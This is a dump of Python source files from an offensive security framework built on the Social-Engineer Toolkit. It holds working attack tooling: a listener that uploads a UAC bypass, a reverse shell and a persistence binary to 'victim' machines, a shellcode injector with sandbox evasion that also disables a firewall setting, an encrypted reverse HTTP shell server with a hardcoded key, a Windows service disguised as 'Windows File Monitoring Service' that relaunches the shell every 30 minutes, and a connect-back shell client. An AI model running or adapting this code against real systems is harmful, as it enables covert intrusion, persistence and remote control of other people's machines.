if os.path.isfile("src/payloads/set_payloads/uac_bypass/x86.binary"):
upload = "src/payloads/set_payloads/uac_bypass/x86.binary"
if os.path.isfile("uac_bypass/x86.binary"):
upload = "uac_bypass/x86.binary"
if os.path.isfile(upload):
fileopen = open(upload, "rb")
print("[*] Attempting to upload UAC bypass to the victim machine.")
# start a loop
data_file = fileopen.read()
fileopen.close()
# send the file line by line to the system
send_packet(data_file, conn, encryption)
# receive length of confirmation
data = conn.recv(1024)
# decrypt the confirmation
data = decrypt_packet(data, encryption)
# now receive confirmation
data = conn.recv(int(data))
# encrypt our confirmation or failed upload
data = decrypt_packet(data, encryption)
# if we were successful
if data == "Confirmed":
print("[*] Initial bypass has been uploaded to victim successfully.")
# if we failed
if data == "Failed":
print("[!] File had an issue saving to the victim machine. Try Again?")
time.sleep(0.5)
# now that we're inside that loop on victim we need to give it parameters
# we will send the write_path to the victim to prep the
# filewrite
send_packet(write_path, conn, encryption)
# specify null variable to store our buffer for our file
data_file = ""
if os.path.isfile("src/payloads/set_payloads/shell.windows"):
upload = "src/payloads/set_payloads/shell.windows"
if os.path.isfile("shell.windows"):
upload = "shell.windows"
if os.path.isfile(upload):
fileopen = open(upload, "rb")
print("[*] Attempting to upload interactive shell to victim machine.")
# start a loop
data_file = fileopen.read()
fileopen.close()
# send the file line by line to the system
send_packet(data_file, conn, encryption)
# receive length of confirmation
data = conn.recv(1024)
# decrypt the confirmation
data = decrypt_packet(data, encryption)
# now receive confirmation
data = conn.recv(int(data))
# encrypt our confirmation or failed upload
data = decrypt_packet(data, encryption)
# if we were successful
if data == "Confirmed":
print("[*] SET Interactive shell successfully uploaded to victim.")
# if we failed
if data == "Failed":
print("[!] File had an issue saving to the victim machine. Try Again?")
send_packet(ipaddress, conn, encryption)
print("[*] You should have a new shell spawned that is UAC safe in a few seconds...")
# remove persistence
if data == "removepersistence":
print("[*] Telling interactive shell to remove persistence from startup.")
send_packet(data, conn, encryption)
print("[*] Service has been scheduled for deletion. It may take a reboot or when the 30 minute loop is finished.")
# persistence
if data == "persistence":
# we place a try except block here, if UAC is enabled
# persistence fails for now
try:
# send that we want to upload a file to the victim
# controller for persistence
send_packet(data, conn, encryption)
time.sleep(0.5)
# now that we're inside that loop on victim we need to give it parameters
# we will send the write_path to the victim to prep the
# filewrite
write_path = "not needed"
# send packet over
send_packet(write_path, conn, encryption)
# specify null variable to store our buffer for our
# file
data_file = ""
if os.path.isfile("src/payloads/set_payloads/persistence.binary"):
if core_modules == True:
subprocess.Popen(
"cp src/payloads/set_payloads/persistence.binary %s" % (userconfigpath), shell=True).wait()
upx("%s/persistence.binary" % (userconfigpath))
upload = "%s/persistence.binary" % (userconfigpath)
if core_modules == False:
upload = "src/payloads/set_payloads/persistence.binary"
if os.path.isfile("persistence.binary"):
upload = "persistence.binary"
if os.path.isfile(upload):
fileopen = open(upload, "rb")
print("[*] Attempting to upload the SET Interactive Service to the victim.")
# start a loop
data_file = fileopen.read()
fileopen.close()
# send the file line by line to the system
send_packet(data_file, conn, encryption)
# receive length of confirmation
data = conn.recv(1024)
# decrypt the confirmation
data = decrypt_packet(data, encryption)
# now receive confirmation
data = conn.recv(int(data))
# encrypt our confirmation or failed upload
data = decrypt_packet(data, encryption)
# if we were successful
if data == "Confirmed":
print("[*] Initial service has been uploaded to victim successfully.")
# if we failed
if data == "Failed":
print("[!] File had an issue saving to the victim machine. Try Again?")
time.sleep(0.5)
# now that we're inside that loop on victim we need to give it parameters
# we will send the write_path to the victim to prep the
# filewrite
send_packet(write_path, conn, encryption)
# specify null variable to store our buffer for our
# file
data_file = ""
if os.path.isfile("src/payloads/set_payloads/shell.windows"):
if core_modules == True:
subprocess.Popen(
"cp src/payloads/set_payloads/shell.windows %s" % (userconfigpath), shell=True).wait()
upx(userconfigpath + "shell.windows")
upload = userconfigpath + "shell.windows"
if core_modules == False:
upload = "src/payloads/set_payloads/shell.windows"
if os.path.isfile("shell.windows"):
upload = "shell.windows"
if os.path.isfile(upload):
fileopen = open(upload, "rb")
print("[*] Attempting to upload SET Interactive Shell to victim machine.")
# start a loop
data_file = fileopen.read()
fileopen.close()
# send the file line by line to the system
send_packet(data_file, conn, encryption)
# receive length of confirmation
data = conn.recv(1024)
# decrypt the confirmation
data = decrypt_packet(data, encryption)
# now receive confirmation
data = conn.recv(int(data))
# encrypt our confirmation or failed upload
data = decrypt_packet(data, encryption)
# if we were successful
if data == "Confirmed":
print("[*] SET Interactive shell successfully uploaded to victim.")
# if we failed
if data == "Failed":
print("[!] File had an issue saving to the victim machine. Try Again?")
send_packet(ipaddress, conn, encryption)
print("[*] Service has been created on the victim machine. You should have a connection back every 30 minutes.")
except Exception:
print("[!] Failed to create service on victim. If UAC is enabled this will fail. Even with bypassUAC.")
# if data is equal to upload
if data == "upload":
# trigger our shell to go in downloadfile mode
data = "uploadfile"
# send that we want to upload a file to the victim
# controller
send_packet(data, conn, encryption)
time.sleep(0.5)
# now that we're inside that loop on victim we need to give it parameters
# we will send the write_path to the victim to prep the
# filewrite
send_packet(write_path, conn, encryption)
# specify null variable to store our buffer for our file
data_file = ""
if os.path.isfile(upload):
fileopen = open(upload, "rb")
print("[*] Attempting to upload %s to %s on victim machine." % (upload, write_path))
# start a loop
data_file = fileopen.read()
fileopen.close()
# send the file line by line to the system
send_packet(data_file, conn, encryption)
# receive length of confirmation
data = conn.recv(1024)
# decrypt the confirmation
data = decrypt_packet(data, encryption)
# now receive confirmation
data = conn.recv(int(data))
# encrypt our confirmation or failed upload
data = decrypt_packet(data, encryption)
# if we were successful
if data == "Confirmed":
print("[*] File has been uploaded to victim under path: " + write_path)
# if we failed
if data == "Failed":
print("[!] File had an issue saving to the victim machine. Try Again?")
# if file wasn't found
else:
print("[!] File wasn't found. Try entering the path again.")
# if data == ssh_port_tunnel
if data == "ssh_tunnel":
# let the server know it needs to switch to paramiko mode
data = "paramiko"
print("[*] Telling the victim machine we are switching to SSH tunnel mode..")
# send encrypted packet to victim
send_packet(data, conn, encryption)
# receive length of confirmation
data = conn.recv(1024)
# decrypt the confirmation
data = decrypt_packet(data, encryption)
# now receive confirmation
data = conn.recv(int(data))
# decrypt packet
data = decrypt_packet(data, encryption)
if data == "Paramiko Confirmed.":
print("[*] Acknowledged the server supports SSH tunneling..")
# send all the data over
data = ssh_server_ip + "," + ssh_server_port_address + "," + ssh_server_tunnel_port + \
"," + ssh_server_username + "," + ssh_server_password + "," + victim_server_port
# encrypt the packet and send it over
send_packet(data, conn, encryption)
print("[*] Tunnel is establishing, check IP Address: " + ssh_server_ip + " on port: " + ssh_server_tunnel_port)
print("[*] As an example if tunneling RDP you would rdesktop localhost 3389")
# list running processes
if data == "ps":
# send encrypted packet to victim
send_packet(data, conn, encryption)
# recv data
data = conn.recv(1024)
data = decrypt_packet(data, encryption)
MSGLEN = 0
dataout = ""
length = int(data)
while MSGLEN != length:
data = conn.recv(1024)
dataout += data
MSGLEN = MSGLEN + len(data)
data = decrypt_packet(dataout, encryption)
print(data)
# reboot server
if data == "reboot now":
data = "reboot"
# send encrypted packet to victim
send_packet(data, conn, encryption)
# recv data
data = conn.recv(1024)
data = decrypt_packet(data, encryption)
MSGLEN = 0
dataout = ""
length = int(data)
while MSGLEN != length:
data = conn.recv(1024)
dataout += data
MSGLEN = MSGLEN + len(data)
data = decrypt_packet(dataout, encryption)
print(data)
# if data is equal to pid kill
if data == "kill":
# send encrypted packet to victim
send_packet(data, conn, encryption)
# send the pid of the packet we want
send_packet(pid_number, conn, encryption)
# wait for confirmation that it was killed
data = conn.recv(1024)
data = decrypt_packet(data, encryption)
print("[*] Process has been killed with PID: " + pid_number)
data = conn.recv(1024)
# if we are executing a command on the local operating system
if data == "exec":
# execute the command via subprocess
proc = subprocess.Popen(
command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
# pipe output for stdout and stderr
stdout_value = proc.stdout.read()
stderr_value = proc.stderr.read()
data = stdout_value + stderr_value
print(data)
# if data is equal to shellcode
if data == "shellcode":
# send that we want to use shellcode to execute
send_packet(data, conn, encryption)
time.sleep(0.5)
# send the file line by line to the system
send_packet(shellcode_inject, conn, encryption)
# handle the main exceptions
except Exception as e:
print("[!] Something went wrong printing error: " + str(e))
log(e)
count = 2
garbage1 = ""
garbage2 = ""
garbage3 = ""
thread.start_new_thread(
call_connections, (d, garbage1, garbage2, garbage3))
sys.exit() # exit_set()
if data == "quit" or data == "exit" or data == "back":
count = 2
garbage1 = ""
garbage2 = ""
garbage3 = ""
thread.start_new_thread(
call_connections, (d, garbage1, garbage2, garbage3))
print_status(
"The Social-Engineer Toolkit (SET) is listening on: 0.0.0.0:" + str(PORT))
# define basic dictionary
global d
d = {}
# function for updating dictionary
def update_dict(conn, addr):
# update dictionary
d[conn] = addr[0]
def call_connections(d, garbage1, garbage2, garbage3):
global count
count = 2
counter = 1
if false_shell == False:
# if tab_complete == True:
# completer = Completer2()
# readline.set_completer(completer.complete)
while 1:
try:
print("*** Pick the number of the shell you want ***\n")
for records in d.items():
if records[1] != "127.0.0.1":
print(str(counter) + ": " + records[1])
counter += 1
print("\n")
# allow us to see connections running in the background
choice = input(setprompt("0", ""))
choice = int(choice)
# if our choice is invalid because the user entered a
# higher number than what was listed, we then cycle back
# through the loop
if choice > counter - 1:
print("[!] Invalid choice, please enter a valid number to interact with.")
if choice <= counter - 1:
break
counter = 1
except ValueError:
counter = 1
if choice == "quit" or choice == "exit" or choice == "back":
print_status("Returning back to the main menu.")
break
if len(choice) != 0:
choice = str(choice)
print("[!] Invalid choice, please enter a valid number to interact with.")
if choice == "quit" or choice == "exit" or choice == "back":
choice = 1
sockobj = socket.socket(AF_INET, SOCK_STREAM)
sockobj.connect(('', PORT))
choice = int(choice) - 1
# counter to dictionary
dict_point = 0
for records in d.items():
# pull our socket handle
if choice == dict_point:
# grab socket handler
conn = records[0]
# grab address
addr = records[1]
# needed to unhose address name and to identify if we need to add
# additional flags. This is a temporary workaround, will add a full
# fledge handler of flags soon.
#
# addr = addr.replace(":UAC-Safe", "")
# addr = addr.replace("WINDOWS:SYSTEM", "")
# addr = addr.replace(":POSIX", "")
# addr = addr.replace(":WINDOWS:UAC-SAFE", "")
# addr = addr.replace(":WINDOWS", "")
# call our shell handler
thread.start_new_thread(
handle_connection, (conn, addr, encryption, operating_system))
# increment dict_point until we hit choice
dict_point += 1
try:
while 1:
if tab_complete == True:
completer = Completer2()
readline.set_completer(completer.complete)
# connection and address for victim
conn, addr = mysock.accept()
# bypass counter
bypass_counter = 0
# if for some reason we got something connecting locally just bomb
# out
if addr[0] == "127.0.0.1":
conn.close()
sys.exit() # pass
# here we test to see if the SET shell is really there or someone
# connected to it.
false_shell = False
if addr[0] != "127.0.0.1":
try:
# we set a 5 second timeout for socket to send data
data = conn.recv(27)
except Exception as e:
print(e)
false_shell = True
# if it isn't windows
if data != "IHAYYYYYIAMSETANDIAMWINDOWS":
# if it isn't nix
if data != "IHAYYYYYIAMSETANDIAMPOSIXXX":
false_shell = True
# if we have a windows shell
if data == "IHAYYYYYIAMSETANDIAMWINDOWS":
if os.path.isfile(userconfigpath + "system.address"):
fileopen = open(userconfigpath + "system.address", "r")
system = fileopen.read().rstrip()
system = system.replace(":WINDOWS", "")
system = system.replace(":UAC-SAFE", "")
if str(addr[0]) == str(system):
temp_addr = str(addr[0] + ":WINDOWS:SYSTEM")
bypass_counter = 1
if os.path.isfile(userconfigpath + "uac.address"):
fileopen = open(userconfigpath + "uac.address", "r")
uac = fileopen.read().rstrip()
uac = uac.replace(":WINDOWS", "")
if str(addr[0]) == str(uac):
temp_addr = str(addr[0] + ":WINDOWS:UAC-SAFE")
bypass_counter = 1
if bypass_counter != 1:
temp_addr = str(addr[0] + ":WINDOWS")
temp_pid = str(addr[1])
temp_addr = [temp_addr, temp_pid]
update_dict(conn, temp_addr)
operating_system = "windows"
bypass_counter = 1
# if we have a nix shell
if data == "IHAYYYYYIAMSETANDIAMPOSIXXX":
temp_addr = str(addr[0] + ":POSIX")
temp_pid = str(addr[1])
temp_addr = [temp_addr, temp_pid]
update_dict(conn, temp_addr)
operating_system = "posix"
bypass_counter = 1
if bypass_counter == 0:
if addr[0] != "127.0.0.1":
if false_shell == False:
update_dict(conn, addr)
# reset value
# if uac != None:
if os.path.isfile(userconfigpath + "uac.address"):
os.remove(userconfigpath + "uac.address")
bypass_counter = 0
if os.path.isfile(userconfigpath + "system.address"):
os.remove(userconfigpath + "system.address")
bypass_counter = 0
if addr[0] != "127.0.0.1":
if false_shell == False:
print("[*] Connection received from: " + addr[0] + "\n")
# set the counter if we get more threads that are legitimate
if false_shell == False:
count += 1
try:
# the first time we try this we dont want to start anything
# else
if count == 1:
# call our main caller handler
garbage1 = ""
garbage2 = ""
garbage3 = ""
thread.start_new_thread(
call_connections, (d, garbage1, garbage2, garbage3))
except TypeError as e: # except typerrors
log(e)
garbage1 = ""
garbage2 = ""
garbage3 = ""
thread.start_new_thread(
call_connections, (d, garbage1, garbage2, garbage3))
except Exception as e: # handle exceptions
print("[!] Something went wrong. Printing error: " + str(e))
log(e)
garbage1 = ""
garbage2 = ""
garbage3 = ""
thread.start_new_thread(
call_connections, (d, garbage1, garbage2, garbage3))
# handle control-c
except KeyboardInterrupt:
exit_menu()
sys.exit(-1)
# handle all exceptions
except Exception as e:
print_error("Something went wrong: ")
print(bcolors.RED + str(e) + bcolors.ENDC)
count = 2
garbage1 = ""
garbage2 = ""
garbage3 = ""
thread.start_new_thread(
call_connections, (d, garbage1, garbage2, garbage3))
log(e)
sys.exit()
# if we are calling from cli
# if __name__ == '__main__':
start_listener()
| 64,520 | Python | .py | 1,253 | 32.448524 | 165 | 0.483048 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,823 | multi_pyinjector.py | CHEGEBB_africana-framework/externals/set/src/payloads/set_payloads/multi_pyinjector.py | #
# The Social-Engineer Toolkit Multi-PyInjector revised and simplified version.
# Version: 0.4
#
# This will spawn only a seperate thread per each shellcode instance.
#
# Much cleaner and optimized code. No longer needs files and is passed via
# command line.
#
# Incorporates AES 256 Encryption when passing shellcode
import ctypes
import sys
import subprocess
import os
import base64
from Cryptodome.Cipher import AES
import multiprocessing
import threading
# added sandbox evasion here - most sandboxes use only 1 core
if multiprocessing.cpu_count() < 2:
exit()
# define our shellcode injection code through ctypes
def injection(sc):
sc = sc.decode("string_escape")
sc = bytearray(sc)
# Initial awesome code and credit found here:
# http://www.debasish.in/2012_04_01_archive.html
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
ctypes.c_int(len(sc)),
ctypes.c_int(0x3000),
ctypes.c_int(0x40))
ctypes.windll.kernel32.VirtualLock(ctypes.c_int(ptr),
ctypes.c_int(len(sc)))
buf = (ctypes.c_char * len(sc)).from_buffer(sc)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
buf,
ctypes.c_int(len(sc)))
ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
ctypes.c_int(0),
ctypes.c_int(ptr),
ctypes.c_int(0),
ctypes.c_int(0),
ctypes.pointer(ctypes.c_int(0)))
ctypes.windll.kernel32.WaitForSingleObject(
ctypes.c_int(ht), ctypes.c_int(-1))
if __name__ == '__main__':
multiprocessing.freeze_support()
subprocess.Popen("netsh advfirewall set global StatefulFTP disable",
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
# this will be our ultimate filename we use for the shellcode generate
# by the Social-Engineer Toolkit
try:
# our file containing shellcode
if len(sys.argv[1]) > 1:
payload_filename = sys.argv[1]
if os.path.isfile(payload_filename):
fileopen = open(payload_filename, "r")
sc = fileopen.read()
# if we didn't file our shellcode path then exit out
if not os.path.isfile(payload_filename):
sys.exit()
if len(sys.argv[2]) > 1:
# this is our secret key for decrypting the AES encrypted traffic
secret = sys.argv[2]
secret = base64.b64decode(secret)
# the character used for padding--with a block cipher such as AES, the value
# you encrypt must be a multiple of BLOCK_SIZE in length. This character is
# used to ensure that your value is always a multiple of BLOCK_SIZE
PADDING = '{'
BLOCK_SIZE = 32
# one-liner to sufficiently pad the text to be encrypted
pad = lambda s: s + (BLOCK_SIZE - len(s) % BLOCK_SIZE) * PADDING
# one-liners to decrypt a string which will be our shellcode
DecryptAES = lambda c, e: c.decrypt(
base64.b64decode(e)).rstrip(PADDING)
cipher = AES.new(secret, AES.MODE_ECB)
# our decrypted value for shellcode
sc = DecryptAES(cipher, sc)
# split our shellcode into a list
sc = sc.split(",")
# except an indexerror and allow it to continue forward
except IndexError:
sys.exit()
jobs = []
for payload in sc:
if payload != "":
p = multiprocessing.Process(target=injection, args=(payload,))
jobs.append(p)
p.start()
| 3,981 | Python | .py | 89 | 32.539326 | 88 | 0.577686 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,824 | set_http_server.py | CHEGEBB_africana-framework/externals/set/src/payloads/set_payloads/set_http_server.py | #!/usr/bin/python3
############################################
#
#
# AES Encrypted Reverse HTTP Listener by:
#
# Dave Kennedy (ReL1K)
# https://www.trustedsec.com
#
#
############################################
from http.server import BaseHTTPRequestHandler
from http.server import HTTPServer
import urllib
import re
import os
import base64
from Cryptodome.Cipher import AES
import sys
import time
from src.core.setcore import *
# the block size for the cipher object; must be 16, 24, or 32 for AES
BLOCK_SIZE = 32
# the character used for padding--with a block cipher such as AES, the value
# you encrypt must be a multiple of BLOCK_SIZE in length. This character is
# used to ensure that your value is always a multiple of BLOCK_SIZE
PADDING = '{'
# one-liner to sufficiently pad the text to be encrypted
pad = lambda s: s + (BLOCK_SIZE - len(s) % BLOCK_SIZE) * PADDING
# one-liners to encrypt/encode and decrypt/decode a string
# encrypt with AES, encode with base64
EncodeAES = lambda c, s: base64.b64encode(c.encrypt(pad(s)))
DecodeAES = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(PADDING)
# 32 character secret key - change this if you want to be unique
secret = "(3j^%sh@hd3hDH2u3h@*!~h~2&^lk<!L"
# create a cipher object using the random secret
cipher = AES.new(secret, AES.MODE_ECB)
# url decode for postbacks
def htc(m):
return chr(int(m.group(1), 16))
# url decode
def urldecode(url):
rex = re.compile('%([0-9a-hA-H][0-9a-hA-H])', re.M)
return rex.sub(htc, url)
class GetHandler(BaseHTTPRequestHandler):
# handle get request
def do_GET(self):
# this will be our shell command
message = input("shell> ")
# if we specify quit, then sys arg out of the shell
if message == "quit" or message == "exit":
print ("\nExiting the SET RevShell Listener... ")
time.sleep(2)
sys.exit()
# send a 200 OK response
self.send_response(200)
# end headers
self.end_headers()
# encrypt the message
message = EncodeAES(cipher, message)
# base64 it
message = base64.b64encode(message)
# write our command shell param to victim
self.wfile.write(message)
# return out
return
# handle post request
def do_POST(self):
# send a 200 OK response
self.send_response(200)
# # end headers
self.end_headers()
# grab the length of the POST data
length = int(self.headers.getheader('content-length'))
# read in the length of the POST data
qs = self.rfile.read(length)
# url decode
url = urldecode(qs)
# remove the parameter cmd
url = url.replace("cmd=", "")
# base64 decode
message = base64.b64decode(url)
# decrypt the string
message = DecodeAES(cipher, message)
# display the command back decrypted
print(message)
# if __name__ == '__main__':
try:
# bind to all interfaces
if check_options("PORT=") != 0:
port = check_options("PORT=")
else:
port = 443
server = HTTPServer(('', int(port)), GetHandler)
print("""############################################
#
# The Social-Engineer Toolkit (SET) HTTP RevShell
#
# Dave Kennedy (ReL1K)
# https://www.trustedsec.com
#
############################################""")
print('Starting encrypted web shell server, use <Ctrl-C> to stop')
# simple try block
try:
# serve and listen forever
server.serve_forever()
# handle keyboard interrupts
except KeyboardInterrupt:
print("[!] Exiting the encrypted webserver shell.. hack the gibson.")
except Exception as e:
print("Something went wrong, printing error: " + e)
| 3,802 | Python | .py | 112 | 29.026786 | 77 | 0.628712 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,825 | persistence.py | CHEGEBB_africana-framework/externals/set/src/payloads/set_payloads/persistence.py | #!/usr/bin/python3
#
##########################################################################
#
# Social-Engineer Toolkit Persistence Service
#
# Right now this is a pretty lame attempt at a service but will grow over time. The text file it reads in from isn't
# really a good idea, but it's a start.
#
##########################################################################
#
# ex usage: persistence.exe install, start, stop, remove
#
# You can see output of this program running python site-packages\win32\lib\win32traceutil for debugging
#
##########################################################################
import win32service
import win32serviceutil
import win32event
import win32evtlogutil
import win32traceutil
import servicemanager
import winerror
import time
import sys
import os
import subprocess
class aservice(win32serviceutil.ServiceFramework):
_svc_name_ = "windows_monitoring"
_svc_display_name_ = "Windows File Monitoring Service"
_svc_deps_ = ["EventLog"]
def __init__(self, args):
win32serviceutil.ServiceFramework.__init__(self, args)
self.hWaitStop = win32event.CreateEvent(None, 0, 0, None)
self.isAlive = True
def SvcStop(self):
# tell Service Manager we are trying to stop (required)
self.ReportServiceStatus(win32service.SERVICE_STOP_PENDING)
# set the event to call
win32event.SetEvent(self.hWaitStop)
self.isAlive = False
def SvcDoRun(self):
import servicemanager
# wait for beeing stopped ...
self.timeout = 1000 # In milliseconds (update every second)
while self.isAlive:
# wait for service stop signal, if timeout, loop again
rc = win32event.WaitForSingleObject(self.hWaitStop, self.timeout)
# expand the filesystem path
windir = os.environ['WINDIR']
# grab homepath
homedir_path = os.getenv("SystemDrive")
homedir_path = homedir_path + "\\Program Files\\Common Files\\"
# pull the windows operating system version number
windows_version = sys.getwindowsversion()[2]
# pull integer of version number
windows_version = int(windows_version)
# windows XP and below
if windows_version < 3791:
fileopen = open("%s\\system32\\isjxwqjs" % (windir), "r")
# windows 7, vista, 2008, etc. that might have UAC so we write to
# AppData instead
if windows_version > 3791:
fileopen = open("%s\\isjxwqjs" % (homedir_path), "r")
for line in fileopen:
# pull set-path, this is pulled from interactive shell and
# written when persistence is called
set_path = line.rstrip()
# specify filename to execute the SET interactive shell
subprocess.Popen('%s' % (set_path), shell=True, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, stdin=subprocess.PIPE)
# sleep 30 mins
time.sleep(1800)
self.ReportServiceStatus(win32service.SERVICE_STOPPED)
return
if __name__ == '__main__':
# f its called with arguments then run
if len(sys.argv) == 1:
try:
evtsrc_dll = os.path.abspath(servicemanager.__file__)
servicemanager.PrepareToHostSingle(aservice)
servicemanager.Initialize('aservice', evtsrc_dll)
servicemanager.StartServiceCtrlDispatcher()
except win32service.error as details:
if details[0] == winerror.ERROR_FAILED_SERVICE_CONTROLLER_CONNECT:
win32serviceutil.usage()
else:
win32serviceutil.HandleCommandLine(aservice)
| 3,786 | Python | .py | 88 | 34.965909 | 116 | 0.610027 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,826 | shell.py | CHEGEBB_africana-framework/externals/set/src/payloads/set_payloads/shell.py | #!/usr/bin/env python3
from socket import *
import subprocess
import sys
import os
import base64
import binascii
import threading
import select
import thread
import time
import random
import string
import sys
import logging
import paramiko
import tempfile
import ctypes
# detect if we're on windows
if os.name == "nt":
operating_system = "windows"
import win32process
import win32api
import win32con
import pythoncom
import pyHook
import win32security
from ntsecuritycon import *
# detect if we're on nix
if os.name == "posix":
operating_system = "posix"
##########################################################################
#
# win32process is a third party module, will need to include it, download the windows binaries, be sure to use
# python 2.5, pyinstaller doesn't like anything above it for the byte compiling.
#
# Note to get pyinstaller to work it was compiled under Python 2.5, be sure to install things manually and
# not through Activestate.
#
# Download win32 modules needed for shell here:
# http://sourceforge.net/projects/pywin32/files/pywin32/Build216/pywin32-216.win32-py2.5.exe/download
#
# You will also need pyCrypto, it's a pain to install if you do it from source, should get the binary modules
# to make it easier. Can download from here:
# http://www.voidspace.org.uk/cgi-bin/voidspace/downman.py?file=pycrypto-2.0.1.win32-py2.5.zip
#
# Will need to download pyHooks from:
# http://sourceforge.net/projects/pyhook/files/pyhook/1.5.1/pyHook-1.5.1.win32-py2.5.exe/download
#
# Be sure to pack it via UPX first in order for the UPX encoding to work properly within SET.
#
##########################################################################
#
#
##########################################################################
#
# Below is the steps used to compile the binary. py2exe requires a dll to be used in conjunction
# so py2exe was not used. Instead, pyinstaller was used in order to byte compile the binary.
#
# Remember to use Python 2.5 for Windows, nothing above and don't use ActiveState, things break.
#
##########################################################################
#
#
##########################################################################
#
# For OSX installation, install ActiveState Python 2.7 and type:
#
# sudo pypm install paramiko
#
# You will then need to go into Configure.py in pyinstaller and look for "64bit". Change it to
# something garbage like dsifsdfidsfdshfois. This is a bug if it detects OSX in 64bit it will
# completely bomb. We fix it with the export VERSIONER below but it was still causing issues.
# Changing the 64bit thing will fix it completely.
#
# You will also need to edit Build.py, search for return '64bit' and change to return '32bit'.
# Another bug for detection.
#
# Then create a bash script and run the below from the command line:
#
# export VERSIONER_PYTHON_PREFER_32_BIT=yes
# python Configure.py
# python Makespec.py --onefile --noconsole shell.py
# python Build.py shell/shell.spec
#
#
# This will allow you to compile the shell via pyinstaller for OSX
#
# On LINUX it's easy just use pyinstaller ensure paramiko is installed
#
##########################################################################
#
#
##########################################################################
#
# download pyinstaller from: http://www.pyinstaller.org/
#
# Make sure your using python2.5, anything above gets buggy.
#
# Make sure you have win32api, paramiko, pycrypto python modules installed
#
# Ensure to install pyinstaller 1.4, 1.5 is buggy.
#
# Unzip: and run the following commands on the shell.py file
#
# python Configure.py
# python Makespec.py --onefile --noconsole shell.py
# python Build.py shell\shell.spec
#
##########################################################################
verbose = True
# random value here to randomize builds
a = 50 * 5
# try block here
try:
# check for an ip address file if we aren't feeding it
temp = tempfile.gettempdir() # prints the current temporary directory
if os.path.isfile(temp + "/42logfile42.tmp"):
fileopen = open(temp + "/42logfile42.tmp", "r")
data = fileopen.read()
data = data.split(" ")
ipaddr = data[0]
port = data[1]
try:
os.remove(temp + "/42logfile42.tmp")
except:
pass
# create a socket object
sockobj = socket(AF_INET, SOCK_STREAM)
# parse the textfile
sockobj.connect((ipaddr, int(port)))
if not os.path.isfile(temp + "/42logfile42.tmp"):
# create a socket object
sockobj = socket(AF_INET, SOCK_STREAM)
# parse command line arguments one and two. First is IP, second is port
sockobj.connect((sys.argv[1], int(sys.argv[2])))
# except index error which means user didn't specify IP and port
except IndexError:
# send error message
# if verbose == True:
print("\nThe Social-Engineer Toolkit Basic Shell\n\nSyntax: shell.exe <ipaddress> <port>")
# exit the program
sys.exit()
# except Exception
except Exception as e:
if verbose == True:
print(e)
# sleep 10 seconds and try to connect again
try:
time.sleep(10)
# create a socket object
sockobj = socket(AF_INET, SOCK_STREAM)
# parse command line arguments one and two. First is IP, second is port
sockobj.connect((sys.argv[1], int(sys.argv[2])))
# wait 10 more and try again
time.sleep(10)
# create a socket object
sockobj = socket(AF_INET, SOCK_STREAM)
# parse command line arguments one and two. First is IP, second is port
sockobj.connect((sys.argv[1], int(sys.argv[2])))
# if not give up
except Exception as e:
if verbose == True:
print(e)
sys.exit()
# tell SET we are the interactive shell
# if we're nix
if operating_system == "windows":
send_string = "IHAYYYYYIAMSETANDIAMWINDOWS"
# if we're nix
if operating_system == "posix":
send_string = "IHAYYYYYIAMSETANDIAMPOSIXXX"
sockobj.send(send_string)
# generate random strings
def generate_random_string(low, high):
length = random.randint(low, high)
letters = string.ascii_letters + string.digits
return ''.join([random.choice(letters) for _ in range(length)])
rand_gen = random_string()
return rand_gen
# this is what we use to either encrypt or not encrypt
def send_packet(message, sockobj, encryption, cipher):
# if we encrypt or not
if encryption == 1:
# we encrypt our output here
encoded = EncodeAES(cipher, message)
# we take the length of the encrypted string
normal_size = len(encoded)
# we turn the length of our string into a string literal
normal_size = str(normal_size)
# we encrypt our string literal
normal_size_crypt = EncodeAES(cipher, normal_size)
# we send our encrypted string literal to let our server know how long our
# true encrypted string is
sockobj.sendall(normal_size_crypt)
# we send our encrypted string
time.sleep(0.5)
sockobj.sendall(encoded)
# if 0 then don't encrypt
if encryption == 0:
normal_size = str(len(message))
message = str(message)
sockobj.send(normal_size)
sockobj.send(str(message))
# decrypt packet routine
def decrypt_packet(message, encryption, cipher):
# if we support encryption
if encryption == 1:
return DecodeAES(cipher, message)
# if we don't support encryption
if encryption == 0:
return message
# receive file from the attacker machine
def upload_file(filename):
# define data as a received information from attacker machine
data = sockobj.recv(1024)
# decrypt the packet which will tell us length to be sent
data = decrypt_packet(data, encryption, cipher)
# this will be our encrypted filepath
data = sockobj.recv(1024)
# decrypted file path, not needed here
data = decrypt_packet(data, encryption, cipher)
# specify file to write
filewrite = open(filename, "wb")
# this will be our length for our file
data = sockobj.recv(1024)
# decrypt the length of our file
data = decrypt_packet(data, encryption, cipher)
# here is an ugly hack but it works, basically we set two
# counters. MSGLEN which will eventually equal the length
# of what number was sent to us which represented the length
# of the output of the shell command we executed. Dataout
# will eventually equal the entire string loaded into our
# buffer then sent for decryption.
#
# A loop is started which continues to receive until we hit
# the length of what our entire full encrypted shell output
# is equaled. Once that occurs, we are out of our loop and
# the full string is sent to the decryption routine and
# presented back to us.
MSGLEN = 0
dataout = ""
length = int(data)
while MSGLEN != length:
data = sockobj.recv(1024)
dataout += data
MSGLEN = MSGLEN + len(data)
data = decrypt_packet(dataout, encryption, cipher)
filewrite.write(data)
# close file after write
filewrite.close()
# confirm its there
if os.path.isfile(filename):
send_packet("Confirmed", sockobj, encryption, cipher)
# if its not then send back failed
if not os.path.isfile(filename):
send_packet("Failed", sockobj, encryption, cipher)
# Note that this module does not come with pre-build binaries you will need either a compiler installed
# on your Windows machine or download the binary blobs from here:
# http://www.voidspace.org.uk/python/modules.shtml#pycrypto
from Cryptodome.Cipher import AES
# set encryption key to 1
encryption = 1
